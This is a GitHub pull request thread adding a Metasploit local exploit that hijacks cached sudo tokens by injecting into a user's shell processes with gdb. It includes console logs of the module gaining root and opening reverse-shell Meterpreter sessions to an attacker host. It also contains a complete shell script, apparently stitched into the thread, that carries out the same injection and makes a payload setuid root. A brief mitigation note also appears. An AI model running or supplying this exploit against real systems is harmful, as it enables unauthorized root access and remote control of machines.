
Add ptrace Sudo Token Privilege Escalation module #11799

Merged
merged 3 commits into from Sep 2, 2019

Conversation

@bcoles (Contributor) commented Apr 30, 2019

Add ptrace Sudo Token Privilege Escalation module.

This module attempts to gain root privileges by blindly injecting into
the session user's running shell processes and executing commands by
calling `system()`, in the hope that the process has valid cached sudo
tokens with root privileges.

The system must have gdb installed and permit ptrace.

Scenarios

CentOS 7.4.1708 (x64)

msf5 > use exploit/linux/local/ptrace_sudo_token_priv_esc 
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] YAMA ptrace scope is not restrictive
[+] SELinux deny_ptrace is disabled
[+] sudo is installed
[+] gdb is installed
[*] Searching for shell processes ...
[*] Found 3 running shell processes
[*] 2343, 2483, 2958
[*] Writing '/tmp/.ka44kFCm8XyMEZ' (329 bytes) ...
[*] Injecting into process 2343 ...
[*] Injecting into process 2483 ...
[*] Injecting into process 2958 ...
[+] /tmp/.ka44kFCm8XyMEZ setuid root successfully
[*] Executing payload...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 172.16.191.141
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.141:53462) at 2019-08-10 02:49:48 -0400
[-] Failed to delete /tmp/.ka44kFCm8XyMEZ: stdapi_fs_delete_file: Operation failed: 1
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : centos-7-1708.localdomain
OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

Debian 9.8 (x64)

msf5 > use exploit/linux/local/ptrace_sudo_token_priv_esc 
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] YAMA ptrace scope is not restrictive
[+] sudo is installed
[+] gdb is installed
[*] Searching for shell processes ...
[*] Found 5 running shell processes
[*] 661, 891, 23499, 23518, 23541
[*] Writing '/tmp/.Dpq90j6vOk' (329 bytes) ...
[*] Injecting into process 661 ...
[*] Injecting into process 891 ...
[*] Injecting into process 23499 ...
[*] Injecting into process 23518 ...
[+] /tmp/.Dpq90j6vOk setuid root successfully
[*] Executing payload...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 172.16.191.232
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.232:50744) at 2019-08-10 02:54:34 -0400
[-] Failed to delete /tmp/.Dpq90j6vOk: stdapi_fs_delete_file: Operation failed: 1
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : debian-9-8-x64.local
OS           : Debian 9.8 (Linux 4.9.0-8-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
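To see the technique outside msfconsole, the following POSIX shell script is an added example and not the module's own code (the module is Ruby and is not reproduced here). It performs the same preflight checks the log above reports (Yama ptrace_scope, SELinux deny_ptrace, gdb and sudo present), enumerates the caller's shell processes from /proc, and attaches to each with gdb so that the shell calls system(3) with a sudo command. The gdb invocation shape, the use of `sudo -n` as the cached-token probe, the `chown root && chmod 4755` command, and the `check`/`attack` subcommands are assumptions of this example, not taken from the module.

```shell
#!/bin/sh
# Added example, not the Metasploit module's code. Assumptions: the gdb
# invocation shape, 'sudo -n' as the cached-token probe, and the payload
# handling are this example's, not the module's.

# Interpret Yama's ptrace_scope. Only an empty value (Yama not built in) or 0
# (classic ptrace permissions) lets a process attach to an unrelated process of
# the same uid; 1 = descendants only, 2 = CAP_SYS_PTRACE needed, 3 = no attach.
yama_permits_attach() {
  case "$1" in
    ""|0) echo yes ;;
    *)    echo no ;;
  esac
}

read_ptrace_scope() {
  if [ -r /proc/sys/kernel/yama/ptrace_scope ]; then
    cat /proc/sys/kernel/yama/ptrace_scope
  else
    echo ""
  fi
}

# SELinux can block ptrace independently of Yama via the deny_ptrace boolean.
selinux_denies_ptrace() {
  if command -v getsebool >/dev/null 2>&1; then
    case "$(getsebool deny_ptrace 2>/dev/null)" in
      *on) echo yes ;;
      *)   echo no ;;
    esac
  else
    echo no
  fi
}

# PIDs of shells owned by the current real uid, read from /proc. A cached sudo
# token is tied to the user's tty by default, so a command run from inside one
# of these shells inherits the tty the token was issued for.
shell_pids() {
  me=$(id -u)
  for p in /proc/[0-9]*; do
    pid=${p#/proc/}
    [ "$pid" = "$$" ] && continue
    comm=$(cat "$p/comm" 2>/dev/null) || continue
    case "$comm" in
      sh|ash|dash|bash|zsh|ksh|fish) ;;
      *) continue ;;
    esac
    owner=$(awk '/^Uid:/ { print $2 }' "$p/status" 2>/dev/null) || continue
    [ "$owner" = "$me" ] && echo "$pid"
  done
  return 0
}

# The injection: attach and make the target call system(3) with our command.
# The (int) cast is needed because the shell binary carries no debug info.
gdb_inject_cmd() {
  printf '%s' "gdb -q -n -p $1 --batch -ex 'call (int)system(\"$2\")'"
}

# Full sequence: preflight, then try each candidate shell until the payload
# becomes setuid root. 'sudo -n' fails instead of prompting when no token is
# cached, so a shell without one just yields a non-zero exit inside gdb.
run_attack() {
  payload=$1
  [ -f "$payload" ] || { echo "$payload: no such file" >&2; return 1; }
  scope=$(read_ptrace_scope)
  if [ "$(yama_permits_attach "$scope")" != yes ]; then
    echo "ptrace_scope=$scope blocks attach" >&2; return 1
  fi
  if [ "$(selinux_denies_ptrace)" = yes ]; then
    echo "SELinux deny_ptrace is on" >&2; return 1
  fi
  for bin in gdb sudo; do
    command -v "$bin" >/dev/null 2>&1 || { echo "$bin not found" >&2; return 1; }
  done
  cmd="sudo -n chown root $payload && sudo -n chmod 4755 $payload"
  for pid in $(shell_pids); do
    echo "injecting into $pid"
    sh -c "$(gdb_inject_cmd "$pid" "$cmd")" >/dev/null 2>&1 || true
    if [ -u "$payload" ] && [ "$(stat -c %u "$payload")" = 0 ]; then
      echo "$payload is setuid root (token found in pid $pid)"
      return 0
    fi
  done
  echo "no shell held a usable sudo token" >&2
  return 1
}

case "${1:-}" in
  check)
    scope=$(read_ptrace_scope)
    echo "ptrace_scope=${scope:-unset} attach_permitted=$(yama_permits_attach "$scope")"
    echo "selinux_deny_ptrace=$(selinux_denies_ptrace)"
    echo "candidate shells: $(shell_pids | tr '\n' ' ')"
    ;;
  attack)
    run_attack "${2:?payload path}"
    ;;
esac
```

`sh script.sh check` only reads /proc and attaches to nothing, so it doubles as a quick exposure check on a host; `attack /path/to/binary` runs the full sequence and needs a compiled binary as the payload, because the kernel ignores the setuid bit on scripts. Two settings each defeat the technique on their own: Yama `ptrace_scope=1` (attach restricted to descendants) and `Defaults timestamp_timeout=0` in sudoers (no cached token to borrow). The "Failed to delete" lines in the log above are consistent with this design: after the chown the file belongs to root inside sticky /tmp, so the unprivileged session that performs cleanup cannot unlink it.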
@wvu-r7 (Contributor) commented Apr 30, 2019

Feel free to use draft mode for future PRs. It'll help signal to us better - and prevent an accidental merge.

@bcoles (Contributor, Author) commented Apr 30, 2019

> Feel free to use draft mode for future PRs. It'll help signal to us better.

I didn't see an option for draft mode when creating the PR.

I do not see an option for draft mode now, either.

A well designed user experience would permit putting a PR into draft mode after creation.

@wvu-r7 (Contributor) commented Apr 30, 2019

I agree. It's really not a great interface. I'm adding a note about it to CONTRIBUTING.md.

@bcoles bcoles added docs and removed delayed labels Aug 10, 2019

@bcoles (Contributor, Author) commented Aug 31, 2019

Bump. This should be a fairly easy merge.

This module is useful for every Linux system with ptrace enabled (Debian and CentOS by default), and will continue to be useful until such time as ptrace is disabled by default, or the way sudo token caching works changes. Although this implementation requires gdb to be installed, which is less likely.

@h00die (Contributor) commented Aug 31, 2019

Non-committal, I'll see if I can knock this out in the next few days

@h00die (Contributor) commented Sep 2, 2019

Centos 7 worked for me:

msf5 exploit(linux/local/ptrace_sudo_token_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 111.111.1.111:4444 
[+] YAMA ptrace scope is not restrictive
[+] SELinux deny_ptrace is disabled
[+] sudo is installed
[+] gdb is installed
[*] Searching for shell processes ...
[*] Found 2 running shell processes
[*] 1049, 1070
[*] Writing '/tmp/.SA8TUHbjwrM7LJ' (277 bytes) ...
[*] Max line length is 65537
[*] Writing 277 bytes in 1 chunks of 886 bytes (octal-encoded), using printf
[*] Injecting into process 1049 ...
[*] Injecting into process 1070 ...
[+] /tmp/.SA8TUHbjwrM7LJ setuid root successfully
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 222.222.2.222

[*] Meterpreter session 3 opened (111.111.1.111:4444 -> 222.222.2.222:47982) at 2019-09-02 10:54:59 -0400

meterpreter > sysinfo
Computer     : centos71.localdomain
OS           : CentOS 7.4.1708 (Linux 3.10.0-693.21.1.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
h00die added a commit that referenced this pull request Sep 2, 2019

@h00die h00die merged commit 47cfcba into rapid7:master Sep 2, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

@h00die h00die self-assigned this Sep 2, 2019

@h00die (Contributor) commented Sep 2, 2019

Worked for me and looks good!

@h00die (Contributor) commented Sep 2, 2019

Release Notes

This PR adds a linux local exploit against cached sudo tokens by injecting into a user's processes.

@bcoles bcoles deleted the bcoles:ptrace_sudo_token_priv_esc branch Sep 2, 2019
